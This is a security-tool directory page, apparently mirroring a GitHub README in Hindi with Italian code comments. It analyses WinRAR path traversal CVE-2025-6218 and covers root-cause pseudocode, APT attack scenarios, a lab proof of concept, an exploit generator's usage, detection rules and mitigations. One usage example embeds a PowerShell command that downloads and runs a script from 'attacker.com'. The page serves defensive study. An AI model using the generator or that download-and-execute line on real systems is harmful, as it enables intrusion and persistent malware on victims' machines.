Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6218-WinRAR-RCE-POC — CVE-2025-6218 के लिए व्यापक विश्लेषण और प्रूफ-ऑफ-कॉन्सेप्ट - WinRAR पथ ट्रैवर्सल RCE भेद्यता जो संस्करण 7.11 और उससे पहले के संस्करणों को प्रभावित करती है | Kitploit
उपकरण/GitHubGitHub/chrxstxqn/cve-2025-6218-winrar-rce-poc
फ़िशिंग उपकरणस्थायित्व तंत्रभेद्यता विश्लेषणशोषणपार्श्व आंदोलनमालवेयर विश्लेषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubchrxstxqn/cve-2025-6218-winrar-rce-poc

CVE-2025-6218-WinRAR-RCE-POC

CVE-2025-6218 के लिए व्यापक विश्लेषण और प्रूफ-ऑफ-कॉन्सेप्ट - WinRAR पथ ट्रैवर्सल RCE भेद्यता जो संस्करण 7.11 और उससे पहले के संस्करणों को प्रभावित करती है

रिपॉजिटरी देखें
218 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-6218: WinRAR Path Traversal RCE

CVE CVSS Score Platform License Status

⚠️ गंभीर कमजोरी - सक्रिय शोषण की पुष्टि

CVE-2025-6218 WinRAR में एक गंभीर पथ ट्रैवर्सल कमजोरी है जो मनमाना कोड निष्पादन की अनुमति देती है। वर्तमान में APT समूहों जैसे GOFFEE, Bitter (APT-C-08) और Gamaredon द्वारा शोषित।


📋 सूची

  • अवलोकन
  • तकनीकी विवरण
  • शोषण तंत्र
  • कमजोर संस्करण
  • हमले के परिदृश्य
  • खतरे के कलाकार
  • प्रूफ ऑफ कॉन्सेप्ट
  • पता लगाना और IOC
  • शमन
  • समयरेखा
  • रिपॉजिटरी संरचना
  • संदर्भ

🎯 अवलोकन

CVE-2025-6218 Windows के लिए WinRAR में एक गंभीर पथ ट्रैवर्सल कमजोरी है जो हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देती है।

मुख्य प्रभाव

यह खतरनाक क्यों है?

एक हमलावर कर सकता है:

  • ✅ संवेदनशील फ़ोल्डरों (Startup, System32) में फ़ाइलें रखना
  • ✅ सिस्टम बूट पर कोड निष्पादित करना
  • ✅ उच्च विशेषाधिकारों के बिना स्थिरता स्थापित करना
  • ✅ एंटीवायरस को बायपास करना (वैध उपकरण का दुरुपयोग)
  • ✅ कॉर्पोरेट नेटवर्क में लेटरल मूवमेंट

🔍 तकनीकी विवरण

कमजोरी क्या है?

WinRAR विशेष .rar संग्रहों के अंदर फ़ाइल पथों को सही ढंग से मान्य नहीं करता है। जब कोई उपयोगकर्ता एक दूषित संग्रह निकालता है, तो फ़ाइलें पथ ट्रैवर्सल अनुक्रमों (../ या ..\\) का उपयोग करके इच्छित निष्कर्षण फ़ोल्डर के बाहर मनमाने पथों पर लिखी जा सकती हैं।

मूल कारण - बग```c

// Pseudocodice - WinRAR v7.11 (VULNERABILE) void extract_file(rar_entry *entry, char *dest_dir) { char final_path[MAX_PATH];

root@kitploit:~
strcpy(final_path, dest_dir);         // "C:\\Temp\\"
strcat(final_path, entry->filename);  // + "..\\..\\..\\Windows\\System32\\malware.exe"

// ❌ ERRORE: Nessuna validazione del path traversal!
// final_path = "C:\\Temp\\..\\..\\..\\Windows\\System32\\malware.exe"
// Risolto come: "C:\\Windows\\System32\\malware.exe" ← EXPLOIT!

create_file(final_path);  // File creato in directory non intesa

}

root@kitploit:~
### v7.11 में अनुपस्थित सुरक्षाएँ

- ❌ कोई जाँच नहीं कि फ़ाइल `dest_dir` के अंदर रहती है या नहीं
- ❌ `..` या `.` अनुक्रमों पर कोई फ़िल्टर नहीं
- ❌ पथों का कोई सामान्यीकरण नहीं
- ❌ अनुमत निर्देशिकाओं की कोई श्वेतसूची नहीं
- ❌ संयोजन (containment) का कोई सत्यापन नहीं

### v7.12 में सुधार```c
// WinRAR v7.12 (PATCHED)
bool is_path_contained(char *path, char *base_dir) {
    char canonical[MAX_PATH], canonical_base[MAX_PATH];
    
    // Normalizza entrambi i percorsi
    GetFullPathName(path, MAX_PATH, canonical, NULL);
    GetFullPathName(base_dir, MAX_PATH, canonical_base, NULL);
    
    // Verifica contenimento
    if (strncmp(canonical, canonical_base, strlen(canonical_base)) != 0) {
        return false;  // Path esce dalla directory base
    }
    return true;
}

void extract_file_safe(rar_entry *entry, char *dest_dir) {
    char final_path[MAX_PATH];
    strcpy(final_path, dest_dir);
    strcat(final_path, entry->filename);
    
    // ✅ FIX: Verifica che il file rimane dentro dest_dir
    if (!is_path_contained(final_path, dest_dir)) {
        skip_extraction();  // Rifiuta estrazione
        log_error("Path traversal detected!");
        return;
    }
    
    create_file(final_path);  // Adesso sicuro
}

💥 एक्सप्लॉइट का तंत्र

Path Traversal की व्याख्या```

Cartella di Estrazione: C:\Temp\Extract

Path nel RAR (craft): ..\..\..\..\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat

Risoluzione Path: C:\Temp\Extract\.. = C:\Temp\ C:\Temp\.. = C:\ C:\.. = C:\ (non può andare oltre)

  • Users\\...\Startup\payload.bat

= C:\Users\\AppData\Roaming\...\Startup\payload.bat ✓

root@kitploit:~
### आक्रमण प्रवाह आरेख```
┌─────────────────────────────────────────────┐
│  1. Attaccante crea RAR con path craft     │
│     es: ..\\..\\..\\Startup\\malware.bat   │
└─────────────────────────────────────────────┘
                    ↓
┌─────────────────────────────────────────────┐
│  2. Distribuzione via spear-phishing        │
│     Email mirata con allegato RAR          │
└─────────────────────────────────────────────┘
                    ↓
┌─────────────────────────────────────────────┐
│  3. Vittima estrae archivio con WinRAR     │
│     (versione ≤ 7.11)                       │
└─────────────────────────────────────────────┘
                    ↓
┌─────────────────────────────────────────────┐
│  4. WinRAR non valida path traversal       │
│     File estratto in Startup folder         │
└─────────────────────────────────────────────┘
                    ↓
┌─────────────────────────────────────────────┐
│  5. Al boot: payload eseguito              │
│     RAT stabilisce C2 connection            │
└─────────────────────────────────────────────┘

🔴 कमजोर संस्करण

संगतता तालिका

अपने संस्करण की जांच कैसे करें```powershell

Metodo 1: PowerShell

(Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion

Output:

7.11.0.0 → 🔴 VULNERABILE ⚠️

7.12.0.0 → 🟢 SAFE ✓

Metodo 2: CMD

wmic datafile where name="C:\\Program Files\\WinRAR\\WinRAR.exe" get Version

Metodo 3: GUI

WinRAR → Help → About WinRAR → Verifica versione

root@kitploit:~
## 🌍 हमले के परिदृश्य

### परिदृश्य 1: Bitter/APT-C-08 Spear-Phishing (सक्रिय पुष्टि)

**लक्ष्य**: सरकार, सैन्य संगठन, रणनीतिक संस्थान```
Email Phishing:
  From: [email protected]
  Subject: "Provision of Information for Sectoral for AJK.rar"
  Attachment: Provision_of_Information.rar

Contenuto Archive:
  ├── Document.docx (esca legittima - report convincente)
  └── ..\\..\\..\\..\\Users\\User\\AppData\\Roaming\\Microsoft\\Office\\STARTUP\\Template.dotm
      (macro malato nascosto)

Esecuzione:
  1. Vittima estrae RAR
  2. WinRAR non valida path → Template.dotm finisce in Office STARTUP
  3. Prossimo avvio Word → Macro eseguita automaticamente
  4. PowerShell downloader attivato
  5. C# Trojan scaricato: WmRAT, MiyaRAT, ZxxZ
  6. C2 Server: johnfashionaccess.com
  7. Capabilities:
     - Keylogging
     - Screenshot capture
     - RDP credential stealing
     - File exfiltration
     - Lateral movement

परिदृश्य 2: GOFFEE मल्टी-स्टेज पेलोड

लक्ष्य: रूसी सरकारी संगठन``` RAR specializzato: ├── run.bat (path: ..\..\..\..\Windows\Startup\run.bat) └── legitimate_document.pdf (esca)

Attack Chain:

  1. Estrazione RAR → run.bat finisce in Startup
  2. Al prossimo boot → run.bat eseguito
  3. PowerShell script scarica stage 2
  4. C# Custom Trojan installato
  5. RAT stabilisce C2 persistente
  6. Full system control achieved
root@kitploit:~
### परिदृश्य 3: रैनसमवेयर वितरण```
RAR Weaponized:
  └── locker.exe (path: ..\\..\\..\\Startup\\locker.exe)

Infezione:
  1. Estrazione RAR
  2. locker.exe → Startup folder
  3. Sistema reboota (naturale o forzato)
  4. locker.exe eseguito con diritti user
  5. File system encryption
  6. Ransom note displayed
  7. Bitcoin payment richiesto

🎭 खतरे के अभिकर्ता

GOFFEE (Paper Werewolf) 🇷🇺

  • उत्पत्ति: रूस
  • पहली बार देखा गया: जुलाई 2025
  • लक्ष्य: रूसी सरकारी संगठन
  • विधि: CVE-2025-6218 + CVE-2025-8088 (NTFS ADS)
  • पेलोड: C# कस्टम ट्रोजन
  • TTP: बहु-चरणीय संक्रमण, NTFS ADS दुरुपयोग

Bitter / APT-C-08 / Manlinghua 🇵🇰

  • उत्पत्ति: दक्षिण एशिया
  • पहली बार देखा गया: अगस्त 2025
  • लक्ष्य: सरकारी, सैन्य, रणनीतिक संगठन
  • विधि: RAR + मैक्रो टेम्पलेट के साथ स्पीयर-फ़िशिंग
  • पेलोड: WmRAT, MiyaRAT, ZxxZ
  • C2: johnfashionaccess.com
  • TTP: सामाजिक इंजीनियरिंग, Office मैक्रो दुरुपयोग
  • स्थिति: 🔴 सक्रिय अभियान

Gamaredon 🇷🇺

  • उत्पत्ति: रूस (FSB-संरेखित APT)
  • पहली बार देखा गया: नवंबर 2025
  • लक्ष्य: यूक्रेनी सरकार
  • पेलोड: GamaWiper (डेटा विनाश)
  • प्रकार: साइबर-तोड़फोड़ + जासूसी
  • TTP: सामूहिक वितरण, वाइपर परिनियोजन

🧪 प्रूफ ऑफ कॉन्सेप्ट

पूर्वापेक्षाएँ```

✅ Windows VM (10, 11, Server) ✅ WinRAR versione ≤ 7.11 installato ✅ Network isolato (no internet - safety first!) ✅ Snapshot VM per rollback ✅ Admin access per testing

root@kitploit:~
### प्रयोगशाला वातावरण सेटअप```powershell
# 1. Crea VM Windows pulita
# 2. Installa WinRAR 7.11
winget install RARLab.WinRAR --version 7.11

# 3. Verifica versione
(Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
# Output: 7.11.0.0 ✓

# 4. Disabilita network
Set-NetAdapter -Name "Ethernet" -Enabled $false

# 5. Crea snapshot
# VM → Snapshot → "Clean WinRAR 7.11 Vulnerable"

Quick Start POC```bash

1. Clone questa repository

git clone https://github.com/Chrxstxqn/CVE-2025-6218-WinRAR-RCE-POC.git cd CVE-2025-6218-WinRAR-RCE-POC

2. Genera exploit archive

python3 exploit/generate_rar.py
--target startup
--payload calc.exe
--output exploit_poc.zip

Output:

[+] Target location: startup

[+] Traversal path: ..\..\..\..\Users\{user}\AppData\...\Startup

[+] Created: exploit_poc.zip

3. Trasferisci exploit_poc.zip su VM vulnerabile

4. Su VM target:

- Right-click exploit_poc.zip

- Extract to C:\

- WinRAR estrae file

5. Verifica exploit success

ls "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"

Dovrebbe mostrare: calc.exe ← PATH TRAVERSAL RIUSCITO!

6. Reboot VM

shutdown /r /t 0

7. Al login: calc.exe eseguito automaticamente ✓

root@kitploit:~
### Exploit Generator उपयोग```bash
# Genera payload per Startup folder
python3 exploit/generate_rar.py --target startup --payload shell.bat

# Genera payload per System32 (richiede admin)
python3 exploit/generate_rar.py --target system32 --payload malware.exe

# Genera con custom batch command
python3 exploit/generate_rar.py \
  --target startup \
  --payload dropper.bat \
  --batch "powershell -NoProfile -Command IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"

# Targets disponibili:
# - startup    : Auto-execution at login
# - system32   : System directory (needs admin)
# - appdata    : User AppData
# - documents  : User Documents
# - temp       : User Temp folder

🔎 डिटेक्शन और IOC

फ़ाइल सिस्टम संकेतक```powershell

Monitor creazione file in Startup

Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -Recurse -File | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }

Check for suspicious Office templates

Get-ChildItem "$env:APPDATA\Microsoft\Office" -Include ".dotm",".xlsm" -Recurse | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) }

Monitor System32 creation (requires admin)

Get-WinEvent -LogName Security -FilterXPath "*[EventData[Data[@Name='ObjectName'] and contains(., 'System32')]]" -MaxEvents 100

root@kitploit:~
### प्रक्रिया निष्पादन```powershell
# Verifica processi in esecuzione da Startup
Get-WmiObject Win32_Process | Where-Object {
    $_.ExecutablePath -like "*Startup*"
} | Select-Object Name, ExecutablePath, ProcessId

# Monitor WinRAR extraction con Sysmon (Event ID 11: File Created)
Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -FilterXPath "*[System[EventID=11]] and *[EventData[Data[@Name='Image'] and contains(., 'WinRAR')]]" -MaxEvents 50

नेटवर्क IOCs (C2 डोमेन)```

johnfashionaccess.com (Bitter/APT-C-08) [additional IOCs from CISA KEV]

root@kitploit:~
### ईमेल संकेतक```
Subject patterns:
  - "Provision of Information"
  - "Sectoral for AJK"
  - Government-related keywords
  
Senders:
  - [email protected]
  - Free email providers (Gmail, Outlook)
  
Attachments:
  - .RAR files da external senders
  - Legitimate-looking document names

YARA Rule```yara

rule CVE_2025_6218_WinRAR_PathTraversal { meta: description = "Detect RAR archives with path traversal sequences" author = "Christian Schito" date = "2025-12-15" cve = "CVE-2025-6218"

root@kitploit:~
strings:
    $rar_sig = { 52 61 72 21 }  // "Rar!" signature
    $traversal1 = "..\\" ascii wide
    $traversal2 = "../" ascii wide
    $startup = "Startup" ascii wide nocase
    $system32 = "System32" ascii wide nocase
    
condition:
    $rar_sig at 0 and 
    (#traversal1 > 3 or #traversal2 > 3) and
    ($startup or $system32)

}

root@kitploit:~
## 🛡️ शमन

### 🔴 तत्काल पैच (महत्वपूर्ण)```powershell
# Verifica versione attuale
$version = (Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
if ($version -le "7.11.0.0") {
    Write-Host "🔴 VULNERABILE! Update richiesto!" -ForegroundColor Red
} else {
    Write-Host "🟢 SAFE - Versione $version patched" -ForegroundColor Green
}

# Download WinRAR 7.12+
# https://www.rarlab.com/rar_add.htm

# Deploy aziendale (SCCM/Intune)
msiexec /i WinRAR-x64-721.msi /quiet /norestart

# Verifica post-update
(Get-Item "C:\Program Files\WinRAR\WinRAR.exe").VersionInfo.FileVersion
# Dovrebbe essere ≥ 7.12.0.0

गहराई में रक्षा

ईमेल सुरक्षा```

✅ Blocca .RAR da external domains ✅ Quarantine archives per deep scanning ✅ Content disarm and reconstruction (CDR) ✅ Sandboxing di allegati sospetti ✅ YARA rules per detection

root@kitploit:~
#### एंडपॉइंट सुरक्षा```powershell
# Scheduled task per monitoring
$action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-File C:\Scripts\monitor_startup.ps1'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 5)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "CVE-2025-6218 Monitor" -Description "Monitor Startup folder for suspicious files"

# Sysmon configuration
# Monitor Event ID 11 (File Created) in sensitive directories

नेटवर्क विभाजन```

✅ Separate admin workstations ✅ Block egress to known C2 domains ✅ Monitor for suspicious DNS queries ✅ Implement zero-trust network access

root@kitploit:~
#### Application Whitelisting```powershell
# AppLocker policy - Block execution from APPDATA\Startup
$rule = New-AppLockerPolicy -RuleType Path -Path "$env:APPDATA\*\Startup\*" -Action Deny -User Everyone
Set-AppLockerPolicy -PolicyObject $rule

उपयोगकर्ता प्रशिक्षण```

✅ Non aprire archivi da email unknown ✅ Verify sender identity prima di aprire attachments ✅ Report suspicious emails al security team ✅ Keep software up-to-date ✅ Use sandboxed environment per file sospetti

root@kitploit:~
---

## 📅 समयरेखा

| दिनांक | घटना |
|--------|------|
| **अज्ञात** | कमजोरी का पता चला |
| **जून 2025** | RARLAB ने पैच के साथ WinRAR 7.12 जारी किया |
| **जुलाई 2025** | GOFFEE (Paper Werewolf) ने सक्रिय शोषण शुरू किया |
| **अगस्त 2025** | BI.ZONE ने विस्तृत तकनीकी विश्लेषण प्रकाशित किया |
| **सितंबर 2025** | Bitter/APT-C-08 की स्पीयर-फिशिंग अभियानों में पुष्टि हुई |
| **नवंबर 2025** | यूक्रेन के खिलाफ Gamaredon के शोषण की पुष्टि |
| **9 दिसंबर 2025** | 🔴 **CISA CVE-2025-6218 को KEV कैटलॉग में जोड़ता है** |
| **30 दिसंबर 2025** | अमेरिकी संघीय एजेंसियों के लिए अनिवार्य पैच समय सीमा |

---

## 📁 भंडार संरचना```
CVE-2025-6218-WinRAR-RCE-POC/
├── README.md                           # Questa guida completa
├── LICENSE                             # MIT License
├── docs/
│   ├── TECHNICAL_ANALYSIS.md          # Deep dive tecnico
│   ├── DETECTION.md                   # Forensics & IOC
│   ├── IOC_INDICATORS.md              # Indicators of Compromise
│   └── SETUP.md                       # Lab setup guide
├── exploit/
│   ├── generate_rar.py                # POC exploit generator (Python)
│   ├── CVE-2025-6218.bat              # Batch script POC
│   └── README.md                      # Exploit usage guide
├── tools/
│   ├── detect.ps1                     # Detection PowerShell script
│   ├── check_version.ps1              # Version checker
│   └── monitor_startup.ps1            # Startup folder monitor
└── samples/
    ├── yara_rules.yar                 # YARA detection rules
    └── sysmon_config.xml              # Sysmon configuration

📚 संदर्भ

आधिकारिक

  • NVD CVE-2025-6218 - आधिकारिक भेद्यता रिकॉर्ड
  • CISA KEV सूची - 9 दिसंबर, 2025 को जोड़ा गया
  • RARLAB सुरक्षा सलाहकार - आधिकारिक पैच डाउनलोड

खतरा खुफिया (थ्रेट इंटेलिजेंस)

  • SecPod विश्लेषण - APT-C-08 अभियान विश्लेषण
  • TheHackerNews रिपोर्ट - सक्रिय शोषण चेतावनी
  • RedHotCyber विश्लेषण - CISA चेतावनी (इतालवी)

सामुदायिक PoCs

  • absholi7ly/CVE-2025-6218
  • skimask1690/CVE-2025-6218-POC
  • ignis-sec/CVE-2025-6218

⚠️ अस्वीकरण (डिस्क्लेमर)

⚠️ केवल शैक्षिक एवं अनुसंधान उपयोग हेतु

यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा अनुसंधान के लिए प्रदान की गई है।

इसका उपयोग न करें:

  • ❌ सिस्टम पर अनधिकृत हमले
  • ❌ कंप्यूटर तक अनधिकृत पहुँच
  • ❌ मैलवेयर का प्रसार
  • ❌ स्थानीय या अंतर्राष्ट्रीय कानूनों का उल्लंघन
  • ❌ किसी भी प्रकार की अवैध गतिविधियाँ

इसका उपयोग केवल करें:

  • ✅ अपने स्वयं के सिस्टम पर
  • ✅ अधिकृत पृथक वर्चुअल मशीनों में
  • ✅ नियंत्रित परीक्षण वातावरण में
  • ✅ स्पष्ट लिखित अनुमति के साथ
  • ✅ वैध अनुसंधान उद्देश्यों के लिए

कानूनी जिम्मेदारी```

L'autore NON è responsabile per:

  • Uso improprio di questo codice
  • Danni causati da questo software
  • Violazioni di legge commesse usando questo materiale

Usando questo repository, accetti di:

  • Rispettare tutte le leggi applicabili
  • Usare il codice solo per scopi legittimi
  • Assumerti piena responsabilità delle tue azioni
root@kitploit:~
**कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। आपको चेतावनी दी गई है।**

---

## 📄 लाइसेंस

MIT लाइसेंस - विवरण के लिए [LICENSE](https://github.com/chrxstxqn/cve-2025-6218-winrar-rce-poc/blob/HEAD/LICENSE) देखें

---

## 🤝 योगदान

योगदान का स्वागत है! यदि आपके पास:
- 🐛 बग रिपोर्ट
- 💡 सुविधा अनुरोध
- 📝 दस्तावेज़ीकरण सुधार
- 🔬 अतिरिक्त IOC

एक **Issue** या **Pull Request** खोलें!

---

## 📞 संपर्क

**लेखक**: Christian Schito  
**GitHub**: [@Chrxstxqn](https://github.com/Chrxstxqn)  
**अंतिम अद्यतन**: दिसंबर 15, 2025  
**स्थिति**: 🔴 सक्रिय अनुसंधान - शोषण की पुष्टि  

---

<div align="center">

**⭐ यदि यह रिपॉजिटरी आपके लिए उपयोगी है, तो एक स्टार दें! ⭐**

**🔒 सुरक्षित रहें। अभी पैच करें। 🔒**

</div>
टूल डाउनलोड करें
पहलूविवरण
CVSS Score7.8 (High)
कमजोर संस्करणWinRAR ≤ 7.11 (Windows only)
प्लेटफॉर्मWindows 10, 11, Server
प्रभावित उपयोगकर्ता~500 मिलियन
पैच किया गयाWinRAR 7.12 (जून 2025)
स्थिति🔴 सक्रिय शोषण
CISA KEV9 दिसंबर 2025 को जोड़ा गया
संस्करणस्थितिनोट्स
≤ 7.10🔴 कमजोरसभी एक्सप्लॉइट काम करते हैं
7.11🔴 कमजोरअंतिम कमजोर संस्करण
7.12 Beta 1+🟢 पैच किया गयापथ ट्रैवर्सल फिक्स
7.12+🟢 पैच किया गयाफिक्स के साथ स्थिर रिलीज
UNIX / Android✅ प्रभावित नहींगैर-विंडोज संस्करण प्रभावित नहीं